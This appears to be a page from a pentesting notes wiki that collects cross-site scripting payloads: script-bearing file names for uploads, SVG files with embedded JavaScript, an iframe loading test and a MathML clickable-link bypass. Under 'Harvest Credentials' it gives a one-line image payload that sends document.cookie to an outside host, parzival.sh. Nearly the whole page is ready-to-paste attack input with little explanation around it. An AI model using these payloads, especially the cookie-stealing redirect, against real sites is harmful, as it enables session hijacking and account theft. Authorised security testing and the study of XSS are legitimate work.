XSS Payloads

Filename

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
<a href="javascript:alert(1)">XSS</a

SVG

Copy and paste the following payload into a .SVG file and attempt to upload it to the application.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS via SVG");
  </script>
</svg>

Copy and paste the following payload into a text editor and see if the image is loaded, if so attempt to follow up with a payload:

<iframe
  src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/movingcart_1.svg"
  frameborder="0"
></iframe>

<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.domain)</script>
</svg>

Bypasses

Math element which can make HTML element clickable:

<math>
    <xss href="javascript:alert(1337)">
       Click Me
    </xss>
</math>

Harvest Credentials

<img/src/onerror=document.location="https://parzival.sh">
<img/src/onerror=document.location="http://parzival.sh/cookie.php?c="+document.cookie>

Resources

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

GitHub - cure53/H5SC: HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectorsGitHub

PreviousStealing Cookies NextCSV Injection

Last updated 1 year ago